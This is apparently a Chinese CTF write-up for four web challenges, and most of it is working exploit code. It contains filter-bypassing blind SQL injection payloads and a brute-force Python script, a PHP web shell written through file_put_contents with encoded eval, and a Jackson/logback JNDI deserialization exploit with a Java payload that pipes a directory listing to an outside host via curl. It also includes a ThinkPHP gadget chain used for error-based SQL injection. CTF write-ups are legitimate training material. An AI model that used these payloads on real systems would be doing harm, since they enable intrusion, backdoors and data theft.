web
happysql
测了一波,发现有黑名单
过滤了 or sleep ' 等等 417的都是被过滤的
用|| 代替or /**/代替空格
发现闭合方式
发现过滤substr,mid,发现可以用left,right
用集合的方式进行布尔盲注
"||"1"in/**/(left(database(),1))#
库名 ctf 由于过滤or,需要绕过information
发现这个能用
mysql.innodb_table_stats
"||"1"/**/in/**/(right(left((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),1),1))#
表名如下 ctf f1ag gtid slave poss
得到f1ag的表名
根据上述文章
采用select * from f1ag 获取f1ag所有的字段值
"||"f"/**/in/**/(right(left((select/**/*/**/from/**/f1ag),1),1))#
这里有个坑
他把-给过滤了,动态靶机懂得都懂 就是python 的uuid,flag肯定有-
所以记得做下处理
总的exp如下
# -*- coding: utf-8 -*-
# @File : sql
# @Author : penson <[email protected]>
# @Email: [email protected]
# @Date : 2021/4/2 10:59
import string
import requests
import os
def sqlinjet(url,payload):
header={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36',
'Cookie': "UM_distinctid = 175b18dcb384ba-0f290792fb4f06-230346d-144000-175b18dcb39493;CNZZDATA1261218610 =1200642698-1605001662-%7C1605366994",
"Content-Type": "application/x-www-form-urlencoded"
}
flag=''
str = string.ascii_letters + string.digits +'{'+'}'+ '-'
for i in range(1,100):
for j in str:
data = {
'username': payload.format(j,i),
'password': "123",
}
print(data['username'])
r = requests.post(url=url,data=data,headers=header,allow_redirects=False)
if "SQL injection detected!" in r.text:
flag+=j
print(flag)
if 'url=home.php' in r.text:
flag+=j
print(flag)
break
if len(flag)>42:
os._exit(0)
if __name__ == '__main__':
url="http://eci-2zegxwtddgwfx2ytn8qh.cloudeci1.ichunqiu.com/login.php"
payload_flag='"||\"{}\"/**/in/**/(right(left((select/**/*/**/from/**/f1ag),{}),1))#'
payload_database = '"||\"{}\"/**/in/**/(right(left((select/**/database()),{}),1))#'
payload_table='"||\"{}\"/**/in/**/(right(left((select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),{}),1))#'
sqlinjet(url,payload_flag)
write_shell
这里关键是利用file_put_contents()
第二个参数可以传递数组
写个phpinfo
?action=upload&data[]=<?=&data[]=ph&data[]=p&data[]=info()&data[]=?>
禁了函数
尝试二次编码绕过
data[]=<?&data[]=eva&data[]=l(urldecode("%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2570%2565%256e%2573%256f%256e%255d%2529%253b"))?>
这段payload我在本地试出来了,估计是版本原因 发现7.2以下这个payload就没得用了
尝试用<?php包裹
发现成功了
蚁剑连接即可
javawewb
访问login,发现要访问json,访问后也没啥结果
POST提交点东西上去
发现shiro的东西,搜一波最新的漏洞
提交个json上去
发现返回了json字符串,比赛中能看到jackjson
拿那个payload打一波试试
https://www.zhihuifly.com/t/topic/540
和fastjson差不多,先开启rmi和ldap服务
poc
package com.by.rmi;
import java.io.BufferedReader;
import java.io.InputStreamReader;
public class ExportObject {
public ExportObject() throws Exception {
Process proc = Runtime.getRuntime().exec("open /Applications/Calculator.app");
BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
StringBuffer sb = new StringBuffer();
String line;
while((line = br.readLine()) != null) {
sb.append(line).append("\n");
}
String result = sb.toString();
Exception e = new Exception(result);
throw e;
}
public static void main(String[] args) throws Exception {
ExportObject e = new ExportObject();
}
}
javac编译成class
python3 -m http.server --bind 0.0.0.0 8000
rjava -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://ip:8000/#ExportObject
payload
["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"rmi://47.96.31.86:1099/Exploit"}]
发现可行
改下脚本直接弹shell
但是看了赵总的文章他说比赛的时候靶机弹shell弹不了,他是尝试外带
import java.io.BufferedReader;import java.io.InputStreamReader;public class ExportObject { public ExportObject() throws Exception { Process proc = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","curl http://ip:port/`ls /|base64`"}); BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream())); StringBuffer sb = new StringBuffer(); String line; while((line = br.readLine()) != null) { sb.append(line).append("\n"); } String result = sb.toString(); Exception e = new Exception(result); throw e; } public static void main(String[] args) throws Exception { ExportObject e = new ExportObject(); }}
easytp
www.zip分析源码
找到控制器
Application/Home/Controller/IndexController.class.php
搜索一波该版本的反序列化利用链
这里需要知道数据库的密码
试一试就可以了密码是root(比赛是123456)
<?phpnamespace Think\Db\Driver{ use PDO; class Mysql{ protected $options = array( PDO::MYSQL_ATTR_LOCAL_INFILE => true // 开启才能读取文件 ); protected $config = array( "debug" => 1, "database" => "mysql", "hostname" => "127.0.0.1", "hostport" => "3306", "charset" => "utf8", "username" => "root", "password" => "root" ); }}namespace Think\Image\Driver{ use Think\Session\Driver\Memcache; class Imagick{ private $img; public function __construct(){ $this->img = new Memcache(); } }}namespace Think\Session\Driver{ use Think\Model; class Memcache{ protected $handle; public function __construct(){ $this->handle = new Model(); } }}namespace Think{ use Think\Db\Driver\Mysql; class Model{ protected $options = array(); protected $pk; protected $data = array(); protected $db = null; public function __construct(){ $this->db = new Mysql(); $this->options['where'] = ''; $this->pk = 'id'; $this->data[$this->pk] = array( "table" => "mysql.user where 1=updatexml(1,user(),1)#", "where" => "1=1" ); } }}namespace { echo base64_encode(serialize(new Think\Image\Driver\Imagick()));}
报错注入
发现有个test,进一步查询flag在这个库里
常规报错注入即可
